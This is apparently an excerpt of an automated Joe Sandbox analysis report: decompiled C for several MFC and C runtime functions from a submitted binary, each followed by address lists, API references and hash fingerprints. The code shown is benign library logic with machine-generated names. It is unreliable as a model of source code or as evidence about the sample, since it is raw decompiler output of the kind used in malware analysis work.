      					_t8 = _a4;
      					if(_t10 == _t8) {
      						L10:
      						return _t3;
      					}
      					if(E009BBA6E(_t10, 3) != 0) {
      						L5:
      						if(_t8 == 0 || (GetWindowLongA(_t8, 0xfffffff0) & 0x40000000) == 0) {
      							L8:
      							_t3 = SendMessageA(_t10, 0x14f, 0, 0);
      							goto L9;
      						} else {
      							_t6 = GetParent(_t8);
      							_t3 = GetDesktopWindow();
      							if(_t6 == _t3) {
      								L9:
      								goto L10;
      							}
      							goto L8;
      						}
      					}
      					_t3 = GetParent(_t10);
      					_t10 = _t3;
      					if(_t10 == _t8) {
      						goto L9;
      					}
      					_t3 = E009BBA6E(_t10, 2);
      					if(_t3 == 0) {
      						goto L9;
      					}
      					goto L5;
      				}
      				return _t3;
      			}
      0x009bbc81
      0x009bbc87
      0x009bbc8b
      0x009bbc8e
      0x009bbc93
      0x009bbcf1
      0x00000000
      0x009bbcf1
      0x009bbca6
      0x009bbcbd
      0x009bbcbf
      0x009bbce0
      0x009bbcea
      0x00000000
      0x009bbcd1
      0x009bbcd2
      0x009bbcd6
      0x009bbcde
      0x009bbcf0
      0x00000000
      0x009bbcf0
      0x00000000
      0x009bbcde
      0x009bbcbf
      0x009bbca9
      0x009bbcab
      0x009bbcaf
      0x00000000
      0x00000000
      0x009bbcb4
      0x009bbcbb
      0x00000000
      0x00000000
      0x00000000
      0x009bbcbb
      0x009bbcf4

      APIs
      • GetFocus.USER32(?,?,009A632A,?), ref: 009BBC81
      • GetParent.USER32(00000000), ref: 009BBCA9
        • Part of subcall function 009BBA6E: GetWindowLongA.USER32 ref: 009BBA8F
        • Part of subcall function 009BBA6E: GetClassNameA.USER32(?,?,0000000A), ref: 009BBAA4
        • Part of subcall function 009BBA6E: CompareStringA.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 009BBABE
      • GetWindowLongA.USER32 ref: 009BBCC4
      • GetParent.USER32(?), ref: 009BBCD2
      • GetDesktopWindow.USER32 ref: 009BBCD6
      • SendMessageA.USER32 ref: 009BBCEA
      Yara matches
      Similarity
      • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
      • String ID:
      • API String ID: 1233893325-0
      • Opcode ID: ed9377c58999389865405ff174118eb386ea11d2aa3ce0932ca9b921947bd29d
      • Instruction ID: fe0b0f743f3f4f936e89f5c90e36c06904b39d6e655eceb953978ebd2237e31a
      • Opcode Fuzzy Hash: ed9377c58999389865405ff174118eb386ea11d2aa3ce0932ca9b921947bd29d
      • Instruction Fuzzy Hash: CF01863224021A67D7219B6E5E8AFEE3B9C9B80F70F150125FA42A71D0DFA4EC064564
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 80%
      			E00AB70CD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t15;
      				LONG* _t21;
      				void* _t29;
      				void* _t31;
      				LONG* _t33;
      				void* _t34;
      				void* _t35;
      
      				_t35 = __eflags;
      				_t29 = __edx;
      				_t25 = __ebx;
      				_push(0xc);
      				_push(0xb19870);
      				E00AAD340(__ebx, __edi, __esi);
      				_t31 = E00AB4284(__ebx, _t35);
      				_t15 =  *0xd0d440; // 0xfffffffe
      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
      					E00AB5091(_t25, _t31, 0xd);
      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
      					_t33 =  *(_t31 + 0x68);
      					 *(_t34 - 0x1c) = _t33;
      					__eflags = _t33 -  *0xd0d348; // 0x2781600
      					if(__eflags != 0) {
      						__eflags = _t33;
      						if(__eflags != 0) {
      							__eflags = InterlockedDecrement(_t33);
      							if(__eflags == 0) {
      								__eflags = _t33 - 0xd0cf20;
      								if(__eflags != 0) {
      									E00AAB4AB(_t33);
      								}
      							}
      						}
      						_t21 =  *0xd0d348; // 0x2781600
      						 *(_t31 + 0x68) = _t21;
      						_t33 =  *0xd0d348; // 0x2781600
      						 *(_t34 - 0x1c) = _t33;
      						InterlockedIncrement(_t33);
      					}
      					 *(_t34 - 4) = 0xfffffffe;
      					E00AB7168();
      				} else {
      					_t33 =  *(_t31 + 0x68);
      				}
      				_t38 = _t33;
      				if(_t33 == 0) {
      					_push(0x20);
      					E00AACC26(_t29, _t38);
      				}
      				return E00AAD385(_t33);
      			}
      0x00ab70cd
      0x00ab70cd
      0x00ab70cd
      0x00ab70cd
      0x00ab70cf
      0x00ab70d4
      0x00ab70de
      0x00ab70e0
      0x00ab70e8
      0x00ab7109
      0x00ab710f
      0x00ab7113
      0x00ab7116
      0x00ab7119
      0x00ab711f
      0x00ab7121
      0x00ab7123
      0x00ab712c
      0x00ab712e
      0x00ab7130
      0x00ab7136
      0x00ab7139
      0x00ab713e
      0x00ab7136
      0x00ab712e
      0x00ab713f
      0x00ab7144
      0x00ab7147
      0x00ab714d
      0x00ab7151
      0x00ab7151
      0x00ab7157
      0x00ab715e
      0x00ab70f0
      0x00ab70f0
      0x00ab70f0
      0x00ab70f3
      0x00ab70f5
      0x00ab70f7
      0x00ab70f9
      0x00ab70fe
      0x00ab7106

      APIs
      • __getptd.LIBCMT ref: 00AB70D9
        • Part of subcall function 00AB4284: __getptd_noexit.LIBCMT ref: 00AB4287
        • Part of subcall function 00AB4284: __amsg_exit.LIBCMT ref: 00AB4294
      • __amsg_exit.LIBCMT ref: 00AB70F9
      • __lock.LIBCMT ref: 00AB7109
      • InterlockedDecrement.KERNEL32(?), ref: 00AB7126
      • _free.LIBCMT ref: 00AB7139
      • InterlockedIncrement.KERNEL32(02781600), ref: 00AB7151
      Yara matches
      Similarity
      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
      • String ID:
      • API String ID: 3470314060-0
      • Opcode ID: 8af2df8c078aa3067e5fa3370fb0b5e23298ac0b2d08eea1ea02ccc6779f17e7
      • Instruction ID: 10ed51afbb9635fa37cfd550c7dbb250e8b98a9eb537733e5881db683745a2a3
      • Opcode Fuzzy Hash: 8af2df8c078aa3067e5fa3370fb0b5e23298ac0b2d08eea1ea02ccc6779f17e7
      • Instruction Fuzzy Hash: 8C015635945711ABDB21EFA8A5067DDB768BF85B20F050106F405A73A2CB74AD81CBF2
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 91%
      			E009C9ABA(void* __ecx) {
      				void* _t14;
      				struct HMENU__* _t15;
      				void* _t16;
      				struct HMENU__* _t17;
      				void* _t18;
      				intOrPtr _t21;
      				void* _t33;
      				void* _t37;
      				void* _t38;
      
      				_t27 = __ecx;
      				_t37 = __ecx;
      				if( *((intOrPtr*)(__ecx + 0x3c)) != 0) {
      					__eax = DestroyMenu(__eax);
      				}
      				_t14 =  *(_t37 + 0x40);
      				if(_t14 != 0) {
      					FreeResource(_t14);
      				}
      				_t15 =  *(_t37 + 0x44);
      				if(_t15 != 0) {
      					DestroyMenu(_t15);
      				}
      				_t16 =  *(_t37 + 0x48);
      				if(_t16 != 0) {
      					FreeResource(_t16);
      				}
      				_t17 =  *(_t37 + 0x4c);
      				if(_t17 != 0) {
      					DestroyMenu(_t17);
      				}
      				_t18 =  *(_t37 + 0x50);
      				if(_t18 != 0) {
      					FreeResource(_t18);
      				}
      				E009A5510( *((intOrPtr*)(_t37 + 0x84)) - 0x10, _t33);
      				E009A5510( *((intOrPtr*)(_t37 + 0x28)) - 0x10, _t33);
      				_t27 = _t37;
      				_pop(_t37);
      				_push(_t37);
      				_t38 = _t27;
      				_t21 =  *((intOrPtr*)(_t38 + 0x10));
      				if(_t21 != 0) {
      					_t21 =  *((intOrPtr*)(_t21 + 0x1c))();
      				}
      				 *(_t38 + 0x1c) =  *(_t38 + 0x1c) & 0x00000000;
      				return _t21;
      			}
      0x009c9aba
      0x009c9abd
      0x009c9acb
      0x009c9ace
      0x009c9ace
      0x009c9ad0
      0x009c9ad5
      0x009c9ad8
      0x009c9ad8
      0x009c9ade
      0x009c9ae3
      0x009c9ae6
      0x009c9ae6
      0x009c9ae8
      0x009c9aed
      0x009c9af0
      0x009c9af0
      0x009c9af6
      0x009c9afb
      0x009c9afe
      0x009c9afe
      0x009c9b00
      0x009c9b05
      0x009c9b08
      0x009c9b08
      0x009c9b17
      0x009c9b22
      0x009c9b28
      0x009c9b2a
      0x009b0633
      0x009b0634
      0x009b0639
      0x009b063d
      0x009b063f
      0x009b063f
      0x009b0642
      0x009b0647

      APIs
      • DestroyMenu.USER32(?,?,?,009B51FD), ref: 009C9ACE
      • FreeResource.KERNEL32(?,?,?,009B51FD), ref: 009C9AD8
      • DestroyMenu.USER32(?,?,?,009B51FD), ref: 009C9AE6
      • FreeResource.KERNEL32(?,?,?,009B51FD), ref: 009C9AF0
      • DestroyMenu.USER32(?,?,?,009B51FD), ref: 009C9AFE
      • FreeResource.KERNEL32(?,?,?,009B51FD), ref: 009C9B08
      Yara matches
      Similarity
      • API ID: DestroyFreeMenuResource
      • String ID:
      • API String ID: 2790856715-0
      • Opcode ID: e9d4b7e4b9a13d6b033fa92e3e9cd88ae46e1e3307cf63488c4b89cf342b7bbc
      • Instruction ID: cf3d2f1f0c4c5d960c537fa641df84a8ccb9c9a4ae047a9f953a537983bc010c
      • Opcode Fuzzy Hash: e9d4b7e4b9a13d6b033fa92e3e9cd88ae46e1e3307cf63488c4b89cf342b7bbc
      • Instruction Fuzzy Hash: 6801F671B007119BDB24EBBE9998F1BB7EDAF88750305092EB543D3A61DE70E800CA61
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E009AFF05(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
      				intOrPtr _v8;
      				signed int _v12;
      				signed int _v16;
      				char* _v20;
      				signed int _v28;
      				intOrPtr _v32;
      				intOrPtr _v40;
      				intOrPtr _v52;
      				signed int _v56;
      				void* __ebp;
      				intOrPtr _t127;
      				void* _t133;
      				intOrPtr _t135;
      				signed int _t145;
      				signed int _t146;
      				signed int _t178;
      				signed int _t180;
      				signed int _t182;
      				signed int _t184;
      				signed int _t186;
      				signed int _t190;
      				void* _t193;
      				intOrPtr _t194;
      				signed int _t204;
      
      				_t193 = __ecx;
      				_t127 = E009BD77F(__ebx, __edi, __esi, __eflags);
      				_v8 = _t127;
      				_t3 =  &_a4;
      				 *_t3 = _a4 &  !( *(_t127 + 0x18));
      				if( *_t3 == 0) {
      					return 1;
      				}
      				_push(__ebx);
      				_push(__esi);
      				_push(__edi);
      				_t204 = 0;
      				E00AAB3F0( &_v56, 0, 0x28);
      				_v52 = DefWindowProcA;
      				_t133 = E009BD77F(__ebx, 0, 0, __eflags);
      				__eflags = _a4 & 0x00000001;
      				_v40 =  *((intOrPtr*)(_t133 + 8));
      				_t135 =  *0xd0fd48; // 0x10003
      				_t190 = 8;
      				_v32 = _t135;
      				_v16 = _t190;
      				if(__eflags != 0) {
      					_push( &_v56);
      					_v56 = 0xb;
      					_v20 = "AfxWnd100s";
      					_t186 = E009AFBA4(_t190, _t193, 0, 0, __eflags);
      					__eflags = _t186;
      					if(_t186 != 0) {
      						_t204 = 1;
      						__eflags = 1;
      					}
      				}
      				__eflags = _a4 & 0x00000020;
      				if(__eflags != 0) {
      					_v56 = _v56 | 0x0000008b;
      					_push( &_v56);
      					_v20 = "AfxOleControl100s";
      					_t184 = E009AFBA4(_t190, _t193, 0, _t204, __eflags);
      					__eflags = _t184;
      					if(_t184 != 0) {
      						_t204 = _t204 | 0x00000020;
      						__eflags = _t204;
      					}
      				}
      				__eflags = _a4 & 0x00000002;
      				if(__eflags != 0) {
      					_push( &_v56);
      					_v56 = 0;
      					_v20 = "AfxControlBar100s";
      					_v28 = 0x10;
      					_t182 = E009AFBA4(_t190, _t193, 0, _t204, __eflags);
      					__eflags = _t182;
      					if(_t182 != 0) {
      						_t204 = _t204 | 0x00000002;
      						__eflags = _t204;
      					}
      				}
      				__eflags = _a4 & 0x00000004;
      				if(__eflags != 0) {
      					_v56 = _t190;
      					_v28 = 0;
      					_t180 = E009AFEC1(_t193, __eflags,  &_v56, "AfxMDIFrame100s", 0x7a01);
      					__eflags = _t180;
      					if(_t180 != 0) {
      						_t204 = _t204 | 0x00000004;
      						__eflags = _t204;
      					}
      				}
      				__eflags = _a4 & _t190;
      				if(__eflags != 0) {
      					_v56 = 0xb;
      					_v28 = 6;
      					_t178 = E009AFEC1(_t193, __eflags,  &_v56, "AfxFrameOrView100s", 0x7a02);
      					__eflags = _t178;
      					if(_t178 != 0) {
      						_t204 = _t204 | _t190;
      						__eflags = _t204;
      					}
      				}
      				__eflags = _a4 & 0x00000010;
      				if(__eflags != 0) {
      					_v12 = 0xff;
      					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x3fc0);
      					_t48 =  &_a4;
      					 *_t48 = _a4 & 0xffffc03f;
      					__eflags =  *_t48;
      				}
      				__eflags = _a4 & 0x00000040;
      				if(__eflags != 0) {
      					_v12 = 0x10;
      					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x40);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00000080;
      				if(__eflags != 0) {
      					_v12 = 2;
      					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x80);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00000100;
      				if(__eflags != 0) {
      					_v12 = _t190;
      					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x100);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00000200;
      				if(__eflags != 0) {
      					_v12 = 0x20;
      					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x200);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00000400;
      				if(__eflags != 0) {
      					_v12 = 1;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x400);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00000800;
      				if(__eflags != 0) {
      					_v12 = 0x40;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x800);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00001000;
      				if(__eflags != 0) {
      					_v12 = 4;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x1000);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00002000;
      				if(__eflags != 0) {
      					_v12 = 0x80;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x2000);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00004000;
      				if(__eflags != 0) {
      					_v12 = 0x800;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x4000);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00008000;
      				if(__eflags != 0) {
      					_v12 = 0x400;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x8000);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00010000;
      				if(__eflags != 0) {
      					_v12 = 0x200;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x10000);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00020000;
      				if(__eflags != 0) {
      					_v12 = 0x100;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x20000);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00040000;
      				if(__eflags != 0) {
      					_v12 = 0x8000;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x40000);
      					__eflags = _t204;
      				}
      				__eflags = _a4 & 0x00080000;
      				if(__eflags != 0) {
      					_v12 = 0x1000;
      					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x80000);
      					__eflags = _t204;
      				}
      				_t194 = _v8;
      				 *(_t194 + 0x18) =  *(_t194 + 0x18) | _t204;
      				_t145 =  *(_t194 + 0x18);
      				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
      				if((_t145 & 0x00003fc0) == 0x3fc0) {
      					_t145 = _t145 | 0x00000010;
      					 *(_t194 + 0x18) = _t145;
      					__eflags = _t204;
      				}
      				asm("sbb eax, eax");
      				_t146 = _t145 + 1;
      				__eflags = _t146;
      				return _t146;
      			}
      0x009aff05
      0x009aff0d
      0x009aff12
      0x009aff1a
      0x009aff1a
      0x009aff1d
      0x00000000
      0x009aff21
      0x009aff27
      0x009aff28
      0x009aff29
      0x009aff33
      0x009aff35
      0x009aff42
      0x009aff45
      0x009aff4a
      0x009aff53
      0x009aff56
      0x009aff5b
      0x009aff5c
      0x009aff5f
      0x009aff62
      0x009aff67
      0x009aff68
      0x009aff6f
      0x009aff76
      0x009aff7b
      0x009aff7d
      0x009aff7f
      0x009aff7f
      0x009aff7f
      0x009aff7d
      0x009aff80
      0x009aff84
      0x009aff86
      0x009aff90
      0x009aff91
      0x009aff98
      0x009aff9d
      0x009aff9f
      0x009affa1
      0x009affa1
      0x009affa1
      0x009aff9f
      0x009affa4
      0x009affa8
      0x009affad
      0x009affae
      0x009affb1
      0x009affb8
      0x009affbf
      0x009affc4
      0x009affc6
      0x009affc8
      0x009affc8
      0x009affc8
      0x009affc6
      0x009affcb
      0x009affcf
      0x009affdf
      0x009affe2
      0x009affe5
      0x009affea
      0x009affec
      0x009affee
      0x009affee
      0x009affee
      0x009affec
      0x009afff1
      0x009afff4
      0x009b0004
      0x009b000b
      0x009b0012
      0x009b0017
      0x009b0019
      0x009b001b
      0x009b001b
      0x009b001b
      0x009b0019
      0x009b001d
      0x009b0021
      0x009b002c
      0x009b0038
      0x009b003a
      0x009b003a
      0x009b003a
      0x009b003a
      0x009b0041
      0x009b0045
      0x009b004d
      0x009b0059
      0x009b0059
      0x009b0059
      0x009b005b
      0x009b005f
      0x009b006a
      0x009b0076
      0x009b0076
      0x009b0076
      0x009b007d
      0x009b0080
      0x009b0087
      0x009b008f
      0x009b008f
      0x009b008f
      0x009b0096
      0x009b0099
      0x009b00a0
      0x009b00ac
      0x009b00ac
      0x009b00ac
      0x009b00b3
      0x009b00b6
      0x009b00bd
      0x009b00c9
      0x009b00c9
      0x009b00c9
      0x009b00d0
      0x009b00d3
      0x009b00da
      0x009b00e6
      0x009b00e6
      0x009b00e6
      0x009b00ed
      0x009b00f0
      0x009b00f7
      0x009b0103
      0x009b0103
      0x009b0103
      0x009b010a
      0x009b010d
      0x009b0114
      0x009b0120
      0x009b0120
      0x009b0120
      0x009b0127
      0x009b012a
      0x009b0131
      0x009b0139
      0x009b0139
      0x009b0139
      0x009b0140
      0x009b0143
      0x009b014a
      0x009b0152
      0x009b0152
      0x009b0152
      0x009b0159
      0x009b015c
      0x009b0163
      0x009b016f
      0x009b016f
      0x009b016f
      0x009b0176
      0x009b0179
      0x009b0180
      0x009b018c
      0x009b018c
      0x009b018c
      0x009b0193
      0x009b0196
      0x009b019d
      0x009b01a5
      0x009b01a5
      0x009b01a5
      0x009b01ac
      0x009b01af
      0x009b01b6
      0x009b01c2
      0x009b01c2
      0x009b01c2
      0x009b01c4
      0x009b01c7
      0x009b01ca
      0x009b01d6
      0x009b01d8
      0x009b01da
      0x009b01dd
      0x009b01e0
      0x009b01e0
      0x009b01ec
      0x009b01ef
      0x009b01ef
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: @$@$AfxFrameOrView100s$AfxMDIFrame100s
      • API String ID: 2102423945-3695979934
      • Opcode ID: 2933d07ff2458276ca76ffb3d926c69a8dde461d60a461da963546c0bbdf2b34
      • Instruction ID: 93df32760495255fc17ad047bf67f886fb37701850414a97a766959ac12ca7ed
      • Opcode Fuzzy Hash: 2933d07ff2458276ca76ffb3d926c69a8dde461d60a461da963546c0bbdf2b34
      • Instruction Fuzzy Hash: 50913EB2C01219BEDB50DFE8C585BDEBBFCAF49344F208165F909E6191E7749A44CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 80%
      			E009B07EF(void* __edx) {
      				signed int _v8;
      				void _v136;
      				int _v140;
      				int _v144;
      				char _v148;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t21;
      				unsigned int _t23;
      				char* _t35;
      				struct HBITMAP__* _t37;
      				unsigned int _t40;
      				signed short _t42;
      				void* _t46;
      				int _t47;
      				unsigned int _t49;
      				void* _t52;
      				signed char* _t53;
      				signed int _t58;
      				void* _t59;
      				signed int _t62;
      				void* _t63;
      				void* _t64;
      				signed int _t66;
      				signed int _t68;
      
      				_t52 = __edx;
      				_t66 = _t68;
      				_t21 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t21 ^ _t66;
      				_t23 = GetMenuCheckMarkDimensions();
      				_t47 = _t23;
      				_t40 = _t23 >> 0x10;
      				_v144 = _t47;
      				_v140 = _t40;
      				if(_t47 <= 4 || _t40 <= 5) {
      					E009B8782(_t47);
      				}
      				if(_t47 > 0x20) {
      					_t47 = 0x20;
      					_v144 = _t47;
      				}
      				asm("cdq");
      				_t62 = _t47 + 0xf >> 4;
      				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
      				if(_t58 > 0xc) {
      					_t58 = 0xc;
      				}
      				if(_t40 > 0x20) {
      					_t40 = 0x20;
      					_v140 = _t40;
      				}
      				E00AAB3F0( &_v136, 0xff, 0x80);
      				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
      				_t53 = 0xad8e18;
      				_t63 = _t62 + _t62;
      				_v148 = 5;
      				do {
      					_t42 = ( *_t53 & 0x000000ff) << _t58;
      					_t53 =  &(_t53[1]);
      					_t49 =  !_t42 & 0x0000ffff;
      					 *_t35 = _t49 >> 8;
      					 *(_t35 + 1) = _t49;
      					_t35 = _t35 + _t63;
      					_t15 =  &_v148;
      					 *_t15 = _v148 - 1;
      				} while ( *_t15 != 0);
      				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
      				_pop(_t59);
      				_pop(_t64);
      				 *0xd0fd58 = _t37;
      				_pop(_t46);
      				if(_t37 == 0) {
      					 *0xd0fd58 = _t37;
      				}
      				return E00AAB46A(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
      			}


      0x009b07ef
      0x009b07f2
      0x009b07fa
      0x009b0801
      0x009b0807
      0x009b080d
      0x009b0813
      0x009b0816
      0x009b081c
      0x009b0825
      0x009b082c
      0x009b082c
      0x009b0834
      0x009b0838
      0x009b0839
      0x009b0839
      0x009b0842
      0x009b0848
      0x009b0856
      0x009b085b
      0x009b085f
      0x009b085f
      0x009b0863
      0x009b0867
      0x009b0868
      0x009b0868
      0x009b087f
      0x009b088f
      0x009b0896
      0x009b089b
      0x009b089d
      0x009b08a7
      0x009b08ac
      0x009b08af
      0x009b08b3
      0x009b08bb
      0x009b08bd
      0x009b08c0
      0x009b08c2
      0x009b08c2
      0x009b08c2
      0x009b08e1
      0x009b08e7
      0x009b08e8
      0x009b08e9
      0x009b08ee
      0x009b08f1
      0x009b08ff
      0x009b08ff
      0x009b090f

      APIs
      • GetMenuCheckMarkDimensions.USER32 ref: 009B0807
      • _memset.LIBCMT ref: 009B087F
      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 009B08E1
      • LoadBitmapW.USER32 ref: 009B08F9
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
      • String ID:
      • API String ID: 4271682439-3916222277
      • Opcode ID: cd8d8744e6de4a6456aa59ed6bcd3f35d6e2168ccde54643fbf9f7a0076a22d1
      • Instruction ID: 98ebdcc890acd6bd2a50575ac4225843b5f6d99891cd2cd26bd40f550d28aa63
      • Opcode Fuzzy Hash: cd8d8744e6de4a6456aa59ed6bcd3f35d6e2168ccde54643fbf9f7a0076a22d1
      • Instruction Fuzzy Hash: B1314971A002189FEB20CF689D85BA977B8FB84310F5540BAF549D7282CE358E44CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009B4757(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
      				void* __edi;
      				struct HWND__* _t10;
      				struct HWND__* _t12;
      				struct HWND__* _t14;
      				struct HWND__* _t15;
      				int _t19;
      				void* _t21;
      				void* _t25;
      				struct HWND__** _t26;
      				void* _t27;
      
      				_t25 = __edx;
      				_t21 = __ebx;
      				_t26 = _a4;
      				_t27 = __ecx;
      				if(E009AA693(__ecx, __eflags, _t26) == 0) {
      					_t10 = E009AD852(__ecx);
      					__eflags = _t10;
      					if(_t10 == 0) {
      						L5:
      						__eflags = _t26[1] - 0x100;
      						if(_t26[1] != 0x100) {
      							L13:
      							return E009AB37E(_t26);
      						}
      						_t12 = _t26[2];
      						__eflags = _t12 - 0x1b;
      						if(_t12 == 0x1b) {
      							L8:
      							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
      							if(__eflags == 0) {
      								goto L13;
      							}
      							_t14 = E009BBADB(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
      							__eflags = _t14;
      							if(_t14 == 0) {
      								goto L13;
      							}
      							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
      							__eflags = _t15;
      							if(_t15 == 0) {
      								L12:
      								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
      								goto L1;
      							}
      							_t19 = IsWindowEnabled(_t15);
      							__eflags = _t19;
      							if(_t19 == 0) {
      								goto L13;
      							}
      							goto L12;
      						}
      						__eflags = _t12 - 3;
      						if(_t12 != 3) {
      							goto L13;
      						}
      						goto L8;
      					}
      					__eflags =  *(_t10 + 0x88);
      					if( *(_t10 + 0x88) == 0) {
      						goto L5;
      					}
      					return 0;
      				}
      				L1:
      				return 1;
      			}


      0x009b4757
      0x009b4757
      0x009b475e
      0x009b4762
      0x009b476b
      0x009b4777
      0x009b477c
      0x009b477e
      0x009b478d
      0x009b478d
      0x009b4794
      0x009b47f2
      0x00000000
      0x009b47f5
      0x009b4796
      0x009b4799
      0x009b479c
      0x009b47a3
      0x009b47ad
      0x009b47af
      0x00000000
      0x00000000
      0x009b47b8
      0x009b47bd
      0x009b47bf
      0x00000000
      0x00000000
      0x009b47c6
      0x009b47cc
      0x009b47ce
      0x009b47db
      0x009b47e7
      0x00000000
      0x009b47e7
      0x009b47d1
      0x009b47d7
      0x009b47d9
      0x00000000
      0x00000000
      0x00000000
      0x009b47d9
      0x009b479e
      0x009b47a1
      0x00000000
      0x00000000
      0x00000000
      0x009b47a1
      0x009b4780
      0x009b4787
      0x00000000
      0x00000000
      0x00000000
      0x009b4789
      0x009b476d
      0x00000000

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
